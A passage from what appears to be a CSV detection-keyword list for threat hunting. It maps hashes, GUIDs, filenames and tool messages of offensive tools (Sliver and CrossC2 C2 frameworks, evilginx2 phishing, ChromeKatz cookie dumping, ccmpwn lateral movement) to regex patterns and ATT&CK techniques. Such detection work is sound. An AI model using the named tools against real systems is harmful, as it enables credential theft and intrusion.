T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cb21e55fb1b580820aaf8090eae7e49cd59360e91456ab85a74828107e1dedde*",".{0,1000}cb21e55fb1b580820aaf8090eae7e49cd59360e91456ab85a74828107e1dedde.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*cb291da763f1ac7b8221be536e9d110a4c937c749da51b15151975c1b84f8b6d*",".{0,1000}cb291da763f1ac7b8221be536e9d110a4c937c749da51b15151975c1b84f8b6d.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*cb3754f82aa212d4875c36e00ee5cdbb84f35250b08f019f8b30a2027e00a0bf*",".{0,1000}cb3754f82aa212d4875c36e00ee5cdbb84f35250b08f019f8b30a2027e00a0bf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cb4272e5aeafc2ee72b02f1f80818ff10214156ed4b8a4ecf12730b13e9a6fd9*",".{0,1000}cb4272e5aeafc2ee72b02f1f80818ff10214156ed4b8a4ecf12730b13e9a6fd9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cb4a4a24fdd61493e58d83befacd93981771c5e8e7ff206b1c6050134613ae4a*",".{0,1000}cb4a4a24fdd61493e58d83befacd93981771c5e8e7ff206b1c6050134613ae4a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone 
man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*CB561720-0175-49D9-A114-FE3489C53661*",".{0,1000}CB561720\-0175\-49D9\-A114\-FE3489C53661.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*CB790E12-603E-4C7C-9DC1-14A50819AF8C*",".{0,1000}CB790E12\-603E\-4C7C\-9DC1\-14A50819AF8C.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*cb93e410d0d8660c4aef3b7f98c08408d3ca972b898705d681d9a569b61c703b*",".{0,1000}cb93e410d0d8660c4aef3b7f98c08408d3ca972b898705d681d9a569b61c703b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cbbadc6ef65c597a7cd81e6f98758815d35ac0530367d87341dd0618b5c7359b*",".{0,1000}cbbadc6ef65c597a7cd81e6f98758815d35ac0530367d87341dd0618b5c7359b.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*cbbb2f474f0ca015a37d57ec856950db3ce62942c8dd737003a9cc8f7cf63c07*",".{0,1000}cbbb2f474f0ca015a37d57ec856950db3ce62942c8dd737003a9cc8f7cf63c07.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cbe60ddb0c22d6a5743901dd06d855958a68a90ab0820665acd1e7b53f0a9c71*",".{0,1000}cbe60ddb0c22d6a5743901dd06d855958a68a90ab0820665acd1e7b53f0a9c71.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","#hash","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" 
"*cbf03e162816e6ba6863355f82b4e9e9853f529d11aa95141fc59781496f8e65*",".{0,1000}cbf03e162816e6ba6863355f82b4e9e9853f529d11aa95141fc59781496f8e65.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*CC127443-2519-4E04-8865-A6887658CDE5*",".{0,1000}CC127443\-2519\-4E04\-8865\-A6887658CDE5.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*cc2_keystrokes*",".{0,1000}cc2_keystrokes.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_keystrokes_*",".{0,1000}cc2_keystrokes_.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_mimipenguin.*",".{0,1000}cc2_mimipenguin\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" 
"*cc2_portscan*",".{0,1000}cc2_portscan.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_portscan_*",".{0,1000}cc2_portscan_.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_rebind_*_get_recv*",".{0,1000}cc2_rebind_.{0,1000}_get_recv.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_rebind_*_get_send*",".{0,1000}cc2_rebind_.{0,1000}_get_send.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera 
- APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_rebind_*_post_recv*",".{0,1000}cc2_rebind_.{0,1000}_post_recv.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_rebind_*_post_send*",".{0,1000}cc2_rebind_.{0,1000}_post_send.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cc2_udp_server*",".{0,1000}cc2_udp_server.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" 
"*cc2FilesColor.*",".{0,1000}cc2FilesColor\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*cc2ProcessColor.*",".{0,1000}cc2ProcessColor\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*cc4e23ea2383b1649d22a6bd176f8b27505919a61d2e838ad337743c32702de7*",".{0,1000}cc4e23ea2383b1649d22a6bd176f8b27505919a61d2e838ad337743c32702de7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*cc5855ec2f5ac4e236e8e6cba698d4d307baa15a827c7719f4d6c8a58d28299b*",".{0,1000}cc5855ec2f5ac4e236e8e6cba698d4d307baa15a827c7719f4d6c8a58d28299b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cc9f09bbdb9277265fd71b7575b1fdda3bc2f946*",".{0,1000}cc9f09bbdb9277265fd71b7575b1fdda3bc2f946.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*ccache2john.py*",".{0,1000}ccache2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" 
"*cce469f76bb65315222426a32f579c4ba820587173b4dffb7f012f5b0bd5a877*",".{0,1000}cce469f76bb65315222426a32f579c4ba820587173b4dffb7f012f5b0bd5a877.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ccea30c929a2846362b054a4692f6ea16c077b8860080b31245b15e12b27e5fb*",".{0,1000}ccea30c929a2846362b054a4692f6ea16c077b8860080b31245b15e12b27e5fb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*CCHOST=127.0.0.1*/tmp/c2*",".{0,1000}CCHOST\=127\.0\.0\.1.{0,1000}\/tmp\/c2.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cckuailong/reapoc*",".{0,1000}cckuailong\/reapoc.{0,1000}","offensive_tool_keyword","reapoc","OpenSource Poc && Vulnerable-Target Storage Box.","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/cckuailong/reapoc","1","1","N/A","N/A","7","659","218","2023-02-06T08:27:09Z","2021-11-28T00:46:27Z" "*CcmExec might not be installed on target*",".{0,1000}CcmExec\smight\snot\sbe\sinstalled\son\starget.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user 
sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*CcmExec service not accessible on remote system! :(*",".{0,1000}CcmExec\sservice\snot\saccessible\son\sremote\ssystem!\s\:\(.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*CCob/BOF.NET*",".{0,1000}CCob\/BOF\.NET.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 